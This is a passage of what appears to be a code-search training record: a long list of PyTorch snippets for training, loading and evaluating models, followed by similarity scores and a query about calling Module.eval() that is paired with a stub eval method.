self.freeze_bn:\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n if self.freeze_bn:\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def on_train_forward(self, runner):\n self.on_iter_forward(runner)", "def on_train_start(self):\n for callback in self.callbacks:\n callback.on_train_start(self, self.get_model())", "def trainModel( self, featureTrain, classTrain):", "def _setup_model(self) -> torch.nn.Sequential:\r\n\r\n # setting up model\r\n ids_ = self.get_hyperparam().get_dim_ids()\r\n if self.get_hyperparam().get_value(ids_[13]):\r\n init_ = lambda mod: self._default_weight_bias_init(mod,\r\n self.get_hyperparam().get_value(ids_[14]),\r\n self.get_hyperparam().get_value(ids_[15]),\r\n self.get_hyperparam().get_value(ids_[16]))\r\n\r\n modules = []\r\n for hd in range(int(self.get_hyperparam().get_value(ids_[3]))+1):\r\n if hd == 0:\r\n act_input_size = self.get_hyperparam().get_value(ids_[0])\r\n output_size = self.get_hyperparam().get_value(ids_[4])[hd]\r\n act_fct = self.get_hyperparam().get_value(ids_[5])[hd]()\r\n elif hd == self.get_hyperparam().get_value(ids_[3]):\r\n act_input_size = self.get_hyperparam().get_value(ids_[4])[hd-1]\r\n output_size = self.get_hyperparam().get_value(ids_[1])\r\n act_fct = self.get_hyperparam().get_value(ids_[6])()\r\n else:\r\n act_input_size = self.get_hyperparam().get_value(ids_[4])[hd-1]\r\n output_size = self.get_hyperparam().get_value(ids_[4])[hd]\r\n act_fct = self.get_hyperparam().get_value(ids_[5])[hd]()\r\n \r\n if self.get_hyperparam().get_value(ids_[13]):\r\n modules.append(init_(torch.nn.Linear(int(act_input_size), int(output_size))))\r\n else:\r\n modules.append(torch.nn.Linear(int(act_input_size), int(output_size)))\r\n modules.append(act_fct)\r\n\r\n model = torch.nn.Sequential(*modules)\r\n \r\n # add process to the model\r\n try:\r\n model = self._add_init(model)\r\n except:\r\n pass \r\n \r\n self._loss_fct = self.get_hyperparam().get_value(ids_[8])()\r\n self._optimizer = self.get_hyperparam().get_value(ids_[7])(model.parameters(), lr=self.get_hyperparam().get_value(ids_[12]))\r\n self._sampling_seed = self.get_hyperparam().get_value(ids_[11])\r\n \r\n return model", "def mode(net: torch.nn.Module, training: bool) -> Iterator[torch.nn.Module]:\n istrain = net.training\n try:\n net.train(training)\n yield net\n finally:\n net.train(istrain)", "def load_networks(self, which_epoch):\n for name in self.model_names:\n if isinstance(name, str):\n filename = '%s_net_%s.pth' % (which_epoch, name)\n path = os.path.join(self.save_dir, filename)\n net = getattr(self, 'net_' + name)\n try:\n state_dict = torch.load(path)\n state_dict = {name.replace('module.', '', 1) : param for name, param in state_dict.items()}\n # net.load_state_dict(torch.load(path))\n net.load_state_dict(state_dict)\n except:\n pretrained_dict = torch.load(path)\n model_dict = net.state_dict()\n try:\n pretrained_dict = {k:v for k,v in pretrained_dict.items() if k in model_dict}\n net.load_state_dict(pretrained_dict)\n print('Pretrained network %s has excessive layers; Only loading layers that are used' % name)\n except:\n print('Pretrained network %s has fewer layers; The following are not initialized:' % name)\n not_initialized = set()\n for k, v in pretrained_dict.items():\n if v.size() == model_dict[k].size():\n model_dict[k] = v\n\n for k, v in model_dict.items():\n if k not in pretrained_dict or v.size() != pretrained_dict[k].size():\n not_initialized.add(k.split('.')[0])\n print(sorted(not_initialized))\n net.load_state_dict(model_dict)\n if len(self.gpu_ids) > 0 and torch.cuda.is_available():\n net.cuda()\n if not self.isTrain:\n net.eval()", "def _set_train(self):\n\n if not self.model.__dict__['training']:\n self.model.train()", "def train(self, dataset):\n \"*** YOUR CODE HERE ***\"\n converged = False\n while not converged:\n failures = 0\n for item, classification in dataset.iterate_once(1):\n prediction = self.get_prediction(item)\n if prediction != nn.as_scalar(classification):\n failures += 1\n self.w.update(item, nn.as_scalar(classification))\n if failures == 0:\n converged = True", "def train(self):\n raise NotImplementedError()", "def train(self, batch_training=False):\n raise NotImplementedError", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def train():\n model.train()\n for batch_index, (xb, yb) in enumerate(train_dl):\n loss = loss_func(model(xb), yb)\n\n loss.backward()\n opt.step()\n opt.zero_grad()", "def __init__(self):\n torch.nn.Module.__init__(self)\n # Convolution and pooling layers of VGG-16.\n self.features = torchvision.models.vgg16(pretrained=True).features\n self.features = torch.nn.Sequential(*list(self.features.children())\n [:-1]) # Remove pool5.\n # Linear classifier.\n self.fc = torch.nn.Linear(512**2, 36)", "def train(model, optimizer, criterion, trainloader, architecture, attacker=None, num_epochs=25, freq=10, early_stopping=True):\n for epoch in range(num_epochs):\n running_loss = 0.0\n total, correct, correct_adv, total_adv = 0.0, 0.0, 0.0, 1.0\n early_stop_param = 0.01\n for i, data in enumerate(trainloader):\n inputs, labels = data\n inputs = Variable(\n (inputs.cuda() if use_cuda else inputs), requires_grad=True)\n labels = Variable(\n (labels.cuda() if use_cuda else labels), requires_grad=False)\n\n y_hat = model(inputs)\n loss = criterion(y_hat, labels)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n _, predicted = torch.max(y_hat.data, 1)\n total += labels.size(0)\n correct += predicted.eq(labels.data).sum()\n\n # print statistics\n running_loss = loss.data[0]\n\n if attacker:\n # only perturb inputs on the last epoch, to save time\n # if (i+1) % freq == 0: # and (epoch == num_epochs - 1):\n adv_inputs, adv_labels, num_unperturbed = attacker.attack(\n inputs, labels, model, optimizer)\n correct_adv += num_unperturbed\n total_adv += labels.size(0)\n\n if (i+1) % freq == 0:\n print('[%s: %d, %5d] loss: %.4f' % (architecture, epoch + 1, i + 1, running_loss / 2),\n correct/total, correct_adv/total_adv)\n if early_stopping:\n if running_loss < early_stop_param:\n print(\"Early Stopping !!!!!!!!!!\")\n break\n running_loss = 0.0\n\n return correct/total, correct_adv/total_adv", "def train(self, ):\n raise NotImplementedError", "def train(self, dataset):\n \"*** YOUR CODE HERE ***\"\n batch_size = 1\n while True:\n error = False\n for x, y in dataset.iterate_once(batch_size):\n y_pred = self.get_prediction(x)\n y = nn.as_scalar(y)\n if y != y_pred:\n error = True\n nn.Parameter.update(self.get_weights(),x,y)\n if error == False:\n break", "def TrainNetwork(self):\n\n self.logger.info('Train Network')\n self.netWork.TrainGenerator()\n\n # # train NetworkLSTM\n self.logger.info('Train NetworkLSTM')\n self.netWork.TrainLSTM()", "def train(self, samples):\n raise NotImplementedError(\"The training method for the MLE model has not been implemented yet.\")", "def _train_model(self):\n raise NotImplementedError()", "def forward(self, images):\n # pylint: disable=arguments-differ\n # The arguments will differ from the base class since nn.Module is an abstract class.\n\n with torch.no_grad():\n latent = self.resnet(images).squeeze()\n features = self.bn(self.fc(latent))\n return features", "def cuda(self):\n for i in self.modules:\n if torch.cuda.is_available():\n self.modules[i] = self.modules[i].cuda()", "def train(self):\n self.training = True", "def train(self, batch):\n pass", "def train(self, trainset):\n\n if self.epoch == 0:\n input_size = trainset.metadata['input_size']\n n_classes = len(trainset.metadata['targets'])\n self.initialize(input_size, n_classes)\n\n for it in range(self.epoch, self.n_epochs):\n for input, target in trainset:\n self.fprop(input, target)\n self.bprop(input, target)\n self.update()\n self.epoch = self.n_epochs", "def test_from_pytorch_training_classification(self):\n import torch.nn as nn\n import torch.nn.functional as F\n\n class CNN(nn.Module):\n def __init__(self):\n super(CNN, self).__init__()\n self.conv1 = nn.Conv2d(1, 16, kernel_size=5, padding=1)\n self.fc1 = nn.Linear(16 * 13 * 13, 100)\n self.fc2 = nn.Linear(100, 2)\n\n def forward(self, x):\n out = self.conv1(x)\n out = F.relu(out)\n out = F.max_pool2d(out, 2)\n out = out.view(-1, 16 * 13 * 13)\n out = self.fc1(out)\n out = F.relu(out)\n out = self.fc2(out)\n out = F.softmax(out, dim=1)\n return out\n\n model_plaintext = CNN()\n batch_size = 5\n x_orig = get_random_test_tensor(size=(batch_size, 1, 28, 28), is_float=True)\n y_orig = (\n get_random_test_tensor(size=(batch_size, 1), is_float=True).gt(0).long()\n )\n y_one_hot = onehot(y_orig, num_targets=2)\n\n # encrypt training sample:\n x_train = crypten.cryptensor(x_orig, requires_grad=True)\n y_train = crypten.cryptensor(y_one_hot)\n dummy_input = torch.empty((1, 1, 28, 28))\n\n for loss_name in [\"BCELoss\", \"CrossEntropyLoss\"]:\n # create encrypted model\n model = crypten.nn.from_pytorch(model_plaintext, dummy_input)\n model.train()\n model.encrypt()\n\n self._check_training(model, x_train, y_train, loss_name)\n\n self._check_model_export(model, x_train)", "def init_parameters(module: nn.Module):\n for m in module.modules():\n if isinstance(m, nn.Conv2d):\n # todo: check if fan_out is valid\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def set_train(self):\n self.model.train()", "def load_pretrained_model(model_name):\n if model_name==\"AlexNet\":\n print(\"Loading pretrained AlexNet Model\")\n model_ft = models.alexnet(pretrained=True)\n\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n param.requires_grad = False\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, 100)\n elif model_name==\"ResNet18\":\n print(\"Loading pretrained ResNet18 Model\")\n model_ft = models.resnet18(pretrained=True)\n\n for param in model_ft.parameters(): # Code for fixing the Conv Layer\n param.requires_grad = False # During Training Conv layer does not learn.\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, 100)\n elif model_name==\"ResNet50\":\n print(\"Loading pretrained ResNet50 Model\")\n\n model_ft = models.resnet50(pretrained=True)\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n param.requires_grad = False\n\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, 100)\n elif model_name==\"DenseNet\":\n print(\"Loading pretrained DenseNet161 Model\")\n model_ft = models.densenet161(pretrained=True)\n\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n param.requires_grad = False\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, 100)\n\n if cfg.load_model_true:\n model_ft.load_state_dict(torch.load(cfg.load_model_path))\n\n return model_ft", "def train(self):\n self.mode = \"train\"\n self.online_net.train()", "def train(self):\n self.mode = \"train\"\n self.online_net.train()", "def test_torch_train_original_layer_multiple(self):\n model = Sequential(\n self.get_digital_layer(in_channels=2, out_channels=2, kernel_size=4, padding=2),\n self.get_digital_layer(in_channels=2, out_channels=3, kernel_size=4, padding=2)\n )\n\n analog_model = Sequential(\n self.get_layer(in_channels=2, out_channels=2, kernel_size=4, padding=2),\n self.get_layer(in_channels=2, out_channels=3, kernel_size=4, padding=2)\n )\n\n for analog_layer, layer in zip(analog_model.children(), model.children()):\n self.set_weights_from_digital_model(analog_layer, layer)\n\n loss_func = mse_loss\n y_b = randn(3, 3, 6, 6, 6)\n x_b = randn(3, 2, 4, 4, 4)\n\n if self.use_cuda:\n y_b = y_b.cuda()\n x_b = x_b.cuda()\n\n self.train_model(model, loss_func, x_b, y_b)\n self.train_model(analog_model, loss_func, x_b, y_b)\n\n for analog_layer, layer in zip(analog_model.children(), model.children()):\n weight, bias = self.get_weights_from_digital_model(analog_layer, layer)\n\n weight_analog, bias_analog = analog_layer.analog_tile.get_weights(realistic=False)\n\n self.assertTensorAlmostEqual(weight_analog, weight)\n if analog_layer.use_bias:\n self.assertTensorAlmostEqual(bias_analog, bias)", "def __init__(self):\n super(SCNN, self).__init__()\n\n # Linear classifier.\n self.inplanes = 128\n self._norm_layer = nn.BatchNorm2d\n self.dilation = 1\n self.groups = 1\n self.base_width = 64\n\n self.num_class = 125\n backbone = torchvision.models.resnet34(pretrained=True)\n self.shared_features = nn.Sequential(*list(backbone.children())[0:6])\n #self.realistic_head = nn.Sequential(*list(backbone.children())[6:8])\n # self.synthetic_head = nn.Sequential(nn.Conv2d(128, 128, 3, 2, 1), nn.BatchNorm2d(128), nn.ReLU(inplace=True),\n # nn.Conv2d(128, 128, 3, 1, 1), nn.BatchNorm2d(128), nn.ReLU(inplace=True),\n # nn.Conv2d(128, 256, 3, 2, 1), nn.BatchNorm2d(256), nn.ReLU(inplace=True),\n # nn.Conv2d(256, 256, 3, 1, 1), nn.BatchNorm2d(256), nn.ReLU(inplace=True))\n\n self.synthetic_head1 = self._make_layer(BasicBlock, 128, 1, stride=2, dilate=False)\n self.synthetic_head2 = self._make_layer(BasicBlock, 256, 1, stride=2, dilate=False)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.classifier = nn.Linear(256, self.num_class)\n\n for m in self.synthetic_head1.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n for m in self.synthetic_head2.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n weight_init(self.classifier)\n\n for param in self.shared_features.parameters():\n param.requires_grad = False", "def load_networks(self, epoch):\n for name in self.model_names:\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net' + name)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # if you are using PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)", "def train(self):\n # For debugging\n torch.autograd.set_detect_anomaly(True)\n # Move variables to device if haven't done so\n self.user_features = self.move_to_cuda(self.user_features, self.device)\n self.item_features = self.move_to_cuda(self.item_features, self.device)\n self.labels = self.move_to_cuda(self.labels, self.device)\n self.model = self.model.to(self.device)\n # Pretrain\n if self.pretrain_bm > 0:\n self.pretrain_bm_net(self.pretrain_bm)\n if self.pretrain_nc > 0:\n self.pretrain_nc_net(self.pretrain_nc)\n # optimizers\n optims = MultipleOptimizer(torch.optim.Adam(self.model.bm_net.parameters(), lr=self.lr),\n torch.optim.Adam(self.model.nc_net.parameters(), lr=self.lr, weight_decay=self.weight_decay))\n # optims = torch.optim.Adam(self.model.parameters(), lr = self.lr)\n\n # criterion = nn.CrossEntropyLoss()\n criterion = F.nll_loss\n best_test_auc = 0.\n best_val_auc = 0.\n best_res = None\n cnt_wait = 0\n patience = 50\n # Training...\n for epoch in range(self.n_epochs):\n self.model.train()\n self.model.zero_grad()\n input_adj = self.adj.clone()\n input_adj = input_adj.to(self.device)\n nc_logits, modified_adj, bm_loss, nc_loss = self.model(input_adj, self.user_features, self.item_features, self.n_epochs, epoch)\n loss = nc_loss + bm_loss * self.alpha\n optims.zero_grad()\n loss.backward()\n # for name, params in self.model.named_parameters():\n # \tif params.requires_grad:\n # \t\tprint(f'{name}: requires grad')\n # \t\tprint(torch.sum(params.grad))\n optims.step()\n # Computation Graph\n # Validation\n self.model.eval()\n with torch.no_grad():\n # input_adj = self.adj.clone()\n # input_adj = input_adj.to(self.device)\n # nc_logits_eval_original, _ = self.model.nc_net(input_adj, self.user_features, self.item_features)\n # input_adj = self.adj.clone()\n # input_adj = input_adj.to(self.device)\n nc_logits_eval_modified, _, _, _ = self.model(input_adj, self.user_features, self.item_features, self.n_epochs, epoch)\n training_res = self.eval_node_cls(nc_logits[self.train_nid].detach(), self.labels[self.train_nid], self.n_classes)\n # res = self.eval_node_cls(nc_logits_eval_original[self.val_nid], self.labels[self.val_nid], self.n_classes)\n res_modified = self.eval_node_cls(nc_logits_eval_modified[self.val_nid], self.labels[self.val_nid], self.n_classes)\n if res_modified['auc'] > best_val_auc:\n cnt_wait = 0\n best_val_auc = res_modified['auc']\n # res_test = self.eval_node_cls(nc_logits_eval_original[self.test_nid], self.labels[self.test_nid], self.n_classes)\n res_test_modified = self.eval_node_cls(nc_logits_eval_modified[self.test_nid], self.labels[self.test_nid], self.n_classes)\n if res_test_modified['auc'] > best_test_auc:\n best_test_auc = res_test_modified['auc']\n best_res = res_test_modified\n self.logger.info('Eland Training, Epoch [{}/{}]: loss {:.4f}, train_auc: {:.4f}, val_auc {:.4f}, test_auc {:.4f}, test_ap {:.4f}'\n .format(epoch+1, self.n_epochs, loss.item(), training_res['auc'], res_modified['auc'], res_test_modified['auc'], res_test_modified['ap']))\n else:\n cnt_wait += 1\n self.logger.info('Eland Training, Epoch [{}/{}]: loss {:.4f}, train_auc: {:.4f}, val_auc {:.4f}'\n .format(epoch+1, self.n_epochs, loss.item(), training_res['auc'], res_modified['auc']))\n\n if cnt_wait >= patience:\n self.logger.info('Early stop!')\n break\n self.logger.info('Best Test Results: auc {:.4f}, ap {:.4f}'.format(best_res['auc'], best_res['ap']))\n\n return best_res['auc'], best_res['ap']" ]
[ "0.8094452", "0.72317255", "0.69105303", "0.6737151", "0.6711554", "0.6629512", "0.6621208", "0.6594015", "0.65665567", "0.6528837", "0.64615065", "0.6457623", "0.6428052", "0.641126", "0.64072895", "0.6387566", "0.6358818", "0.634253", "0.63398683", "0.63197255", "0.63110536", "0.6310502", "0.63036263", "0.6300579", "0.6283196", "0.62712526", "0.6257498", "0.6255961", "0.6243613", "0.62399054", "0.62313414", "0.62306345", "0.62142986", "0.62122494", "0.62084174", "0.620247", "0.6163773", "0.61531425", "0.6145708", "0.6124872", "0.6123768", "0.6119132", "0.61173755", "0.61167026", "0.61108863", "0.61097693", "0.610549", "0.61004114", "0.6097006", "0.6085785", "0.60818017", "0.60768247", "0.6073637", "0.6072556", "0.6068468", "0.60585994", "0.60568076", "0.6048771", "0.6042688", "0.6042243", "0.6033289", "0.6017395", "0.6008673", "0.59965074", "0.5996202", "0.59819436", "0.59749734", "0.5974302", "0.59649295", "0.5964085", "0.5959008", "0.59452677", "0.5938158", "0.59355485", "0.59351623", "0.59340745", "0.59309113", "0.59280145", "0.5926845", "0.59251606", "0.59196955", "0.59128034", "0.5900301", "0.5887435", "0.5874292", "0.58655405", "0.58649087", "0.58633524", "0.5861694", "0.5853921", "0.5852329", "0.5852329", "0.58481723", "0.5846498", "0.58451736", "0.5841451" ]
0.6031432
65
Should call Module.eval() on each torch.nn.Module, if present
def eval(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def eval(self) -> None:\n for module in self.modules.values():\n module.eval()\n return", "def to_eval(self):\n for _m in self.modules.values():\n _m.eval()", "def eval(self):\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net' + name)\n net.eval()", "def eval(self):\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net' + name)\n net.eval()", "def eval(self):\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net_' + name)\n net.eval()", "def train(self, mode=True):\n super().train(mode)\n if mode and self.norm_eval:\n for m in self.modules():\n if isinstance(m, _BatchNorm):\n m.eval()", "def train(self) -> None:\n for module in self.modules.values():\n module.train()\n return", "def evaluate_module(\n model: nn.Module,\n dataset: Union[NumpyArrayTuple, torch.utils.data.Dataset],\n loss_fn,\n device: torch.device,\n metrics_map: MetricsMapType = None,\n batch_size: int = 64,\n verbose: bool = True,\n) -> MetricsValType:\n try:\n model = model.to(device)\n\n # if dataset is a tuple of np.ndarrays, convert to torch Dataset\n if isinstance(dataset, tuple):\n X = torch.from_numpy(dataset[0]).type(torch.FloatTensor)\n y = torch.from_numpy(dataset[1]).type(\n torch.LongTensor if dataset[1].dtype in [np.int, np.long] else torch.FloatTensor\n )\n dataset = torch.utils.data.TensorDataset(X, y)\n\n loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=False)\n\n tot_samples, samples, num_batches = len(dataset), 0, 0\n len_tot_samples = len(str(tot_samples))\n\n # create metrics history\n history = MetricsHistory(metrics_map)\n\n with torch.no_grad():\n model.eval()\n for X, y in loader:\n X = X.to(device)\n y = y.to(device)\n\n # forward pass\n preds = model(X)\n # compute batch loss\n batch_loss = loss_fn(preds, y).item()\n history.calculate_batch_metrics(preds.to(\"cpu\"), y.to(\"cpu\"), batch_loss, val_metrics=False)\n samples += len(y)\n num_batches += 1\n if verbose:\n metricsStr = history.get_metrics_str(batch_metrics=True, include_val_metrics=False)\n print(\n \"\\rEvaluating (%*d/%*d) -> %s\"\n % (len_tot_samples, samples, len_tot_samples, tot_samples, metricsStr),\n end=\"\",\n flush=True,\n )\n else:\n # iteration over batch completed\n # calculate average metrics across all batches\n history.calculate_epoch_metrics(val_metrics=False)\n metricsStr = history.get_metrics_str(batch_metrics=False, include_val_metrics=False)\n print(\n \"\\rEvaluating (%*d/%*d) -> %s\"\n % (len_tot_samples, samples, len_tot_samples, tot_samples, metricsStr),\n flush=True,\n )\n return history.get_metric_vals(history.tracked_metrics())\n finally:\n model = model.to(\"cpu\")", "def set_eval(self):\n for m in self.models.values():\n m.eval()", "def evaluate_basin(\n model: nn.Module, loader: DataLoader, normalization_dict: Dict[str, np.ndarray]\n) -> Tuple[np.ndarray, np.ndarray]:\n model.eval()\n\n preds, obs = None, None\n\n with torch.no_grad():\n for data in loader:\n if len(data) == 2:\n x, y = data\n x, y = x.to(DEVICE), y.to(DEVICE)\n p = model(x)[0]\n elif len(data) == 3:\n x_d, x_s, y = data\n x_d, x_s, y = x_d.to(DEVICE), x_s.to(DEVICE), y.to(DEVICE)\n p = model(x_d, x_s[:, 0, :])[0]\n\n if preds is None:\n preds = p.detach().cpu()\n obs = y.detach().cpu()\n else:\n preds = torch.cat((preds, p.detach().cpu()), 0)\n obs = torch.cat((obs, y.detach().cpu()), 0)\n\n preds = rescale_features(\n preds.numpy(), variable=\"target\", normalization_dict=normalization_dict\n )\n obs = obs.numpy()\n # set discharges < 0 to zero\n preds[preds < 0] = 0\n\n return preds, obs", "def load_networks(self, epoch: int) -> None:\n for name, module in self.modules.items():\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n if isinstance(module, torch.nn.DataParallel):\n module = module.module\n print('loading the model from %s' % load_path)\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, module, key.split('.'))\n module.load_state_dict(state_dict)\n return", "def train(self, mode=True):\n super().train(mode)\n self._freeze_stages()\n if mode and self.norm_eval:\n for m in self.modules():\n if isinstance(m, _BatchNorm):\n m.eval()", "def eval(self):\n for name in self.network_names:\n if isinstance(name, str):\n net = getattr(self, 'net')\n net.eval()", "def evaluate(model: torch.nn.Module, dummy_input: torch.Tensor):\n model.eval()\n if isinstance(dummy_input, torch.Tensor):\n dummy_input = [dummy_input]\n with torch.no_grad():\n model(*dummy_input)", "def evaluate(model: torch.nn.Module, dummy_input: torch.Tensor):\n if isinstance(dummy_input, torch.Tensor):\n dummy_input = [dummy_input]\n\n model.eval()\n with torch.no_grad():\n model(*dummy_input)", "def train(self, mode=True):\n super(ResNet, self).train(mode)\n self._freeze_stages()\n if mode and self.norm_eval:\n for m in self.modules():\n # trick: eval have effect on BatchNorm only\n if isinstance(m, _BatchNorm):\n m.eval()", "def simulate_modules(self):\n for discrete_mod in list(self.modcells.keys()):\n # print(discrete_mod)\n # print('in simulate_modules, iterating to ', discrete_mod)\n self.simulate_module(discrete_mod)", "def evaluate():\n\tmodel.eval()\n\tstddev = 1 # And mean=0\n\tfor batch_idx, (data, _) in enumerate(syn_test_loader):\n\t\tdata = data.cuda()\n\t\tif batch_idx == 0:\n\t\t\tnoise = torch.autograd.Variable(torch.randn(batch_size, bottleneck).cuda() * stddev)\n\t\t\tsample_representation(\"orig_nat\", data, noise)\n\t\t\tsample_representation(\"natural\", data, noise)\n\t\t\tsample_representation(\"orig_syn\", data, noise)\n\t\t\tsample_representation(\"synth\", data, noise)", "def run_modules():\n pool = Pool()\n if module_inc_opts != ['']:\n runmods = gen_runlist(module_inc_opts, available_mods)\n if not multiprocessing:\n for module in runmods:\n modExec(module)\n else:\n runner = pool.map(modExec, runmods)\n\n elif module_exc_opts != ['']:\n runmods = [x for x in available_mods if x not in gen_runlist(module_exc_opts, available_mods)]\n\n if not multiprocessing:\n for module in runmods:\n modExec(module)\n else:\n runner = pool.map(modExec, runmods)\n\n pool.close()\n pool.join()", "def compile(self):\n for layer in self.layers:\n layer._Dense__load()", "def process_module_list(self, modules):", "def to_train(self):\n for _m in self.modules.values():\n _m.train()", "def test(self, test_loader):\n\n self.model.eval()\n with torch.no_grad():\n return self.tester(test_loader, verbose=False)", "def eval_all(self, plot: bool = True) -> None:\n # evaluate all ports\n for port in self.pm.ports.values():\n for t in [\"base\", \"transfer\"]:\n self.eval_port(port, training_type=t, plot=plot)\n\n if plot:\n self.plot_ports_by_mae(training_type=\"base\")\n self.plot_ports_by_mae(training_type=\"transfer\")", "def test_model(net, data_loader):\n net.eval()\n running_loss = 0.0\n with torch.no_grad():\n for data in data_loader:\n X = data['X']\n y_d = data['y_descreen']\n outputs = net(X)\n loss = criterion(outputs, y_d)\n running_loss += loss\n return running_loss", "def evaluate_batch(self, batch: TorchData, model: nn.Module) -> Dict[str, Any]:\n pass", "def test_non_leaf_module_names(self):\n class Net(torch.nn.Module):\n \"\"\"\n Model using multiply as functional and module at different depths\n \"\"\"\n def __init__(self):\n super().__init__()\n self.layer = HierarchicalMultiplyModule()\n\n def forward(self, x):\n return self.layer(x)\n\n model = Net()\n dummy_input = torch.randn(10, 1, 3)\n onnx_path = './data/MyModel.onnx'\n\n torch.onnx.export(model, dummy_input, onnx_path)\n onnx_utils.OnnxSaver.set_node_names(onnx_path, model, dummy_input)\n\n onnx_model = onnx.load(onnx_path)\n onnx.checker.check_model(onnx_model)\n self.check_onnx_node_name_uniqueness(onnx_model)\n\n expected_names = [\n # names compatible with torch 1.9.1 version (should be removed in the future)\n 'layer.mul1.mul',\n 'layer.mul1.Mul_7',\n 'layer.mul2.mul',\n 'layer.mul2.Mul_15',\n 'layer.Mul_18',\n \n # names compatible with torch 1.13.1 version \n '/layer/mul1/Mul',\n '/layer/mul2/Mul',\n '/layer/Mul'\n ]\n for node in onnx_model.graph.node:\n assert 'Constant' in node.name or node.name in expected_names\n\n if os.path.exists(onnx_path):\n os.remove(onnx_path)", "def define_module(self):\n # pylint: disable=invalid-name\n # Small names like fc abd bn are fine in this context.\n\n resnet = resnet152(pretrained=True)\n modules = list(resnet.children())[:-1] # delete the last fc layer.\n for module in modules:\n module.requires_grad = False\n self.resnet = nn.Sequential(*modules)\n self.fc = nn.Linear(resnet.fc.in_features, self.d_embed)\n self.bn = nn.BatchNorm1d(self.d_embed, momentum=0.01)", "def evaluate_basin(\n model: nn.Module, loader: DataLoader, user_cfg: Dict\n) -> Tuple[np.ndarray, np.ndarray]:\n model.eval()\n\n preds, obs = None, None\n with torch.no_grad():\n for data in loader:\n if len(data) == 2:\n x, y = data\n x, y = x.to(user_cfg[\"device\"]), y.to(user_cfg[\"device\"])\n p = model(x)[0]\n elif len(data) == 3:\n x_d, x_s, y = data\n x_d, x_s, y = (\n x_d.to(user_cfg[\"device\"]),\n x_s.to(user_cfg[\"device\"]),\n y.to(user_cfg[\"device\"]),\n )\n p = model(x_d, x_s[:, 0, :])[0]\n\n if preds is None:\n preds = p.detach().cpu()\n obs = y.detach().cpu()\n else:\n preds = torch.cat((preds, p.detach().cpu()), 0)\n obs = torch.cat((obs, y.detach().cpu()), 0)\n\n preds = rescale_features(\n preds.numpy(),\n variable=\"output\",\n scaler_dir=user_cfg[\"train_basin_file\"].parent,\n )\n obs = obs.numpy()\n # set discharges < 0 to zero\n preds[preds < 0] = 0\n\n return preds, obs", "def do_one_mod(self, names: List[str], infer: bool, exec_: bool, conf: dict):\n\n p = lambda: Progress(\n TextColumn(\"[progress.description]{task.description}\", justify=\"right\"),\n BarColumn(bar_width=None),\n \"[progress.percentage]{task.percentage:>3.1f}%\",\n \"[progress.completed]{task.completed} / {task.total}\",\n TimeElapsedColumn(),\n )\n # step one collect all the modules instances we want to analyse.\n\n modules = []\n for name in names:\n x, *r = name.split(\".\")\n n0 = __import__(name)\n for sub in r:\n n0 = getattr(n0, sub)\n modules.append(n0)\n\n # step 2 try to guess the version number from the top module.\n version = getattr(modules[0], \"__version__\", \"???\")\n\n root = names[0].split(\".\")[0]\n module_conf = conf.get(root, {})\n examples_folder = module_conf.get(\"examples_folder\", None)\n print(\"EF\", examples_folder)\n if examples_folder is not None:\n examples_folder = Path(examples_folder).expanduser()\n examples_data = self.collect_examples(examples_folder)\n for edoc, figs in examples_data:\n self.examples.update(\n {k: json.dumps(v.to_json()) for k, v in edoc.items()}\n )\n for name, data in figs:\n print(\"put one fig\", name)\n self.put_raw(name, data)\n print(\"Configuration:\", json.dumps(module_conf, 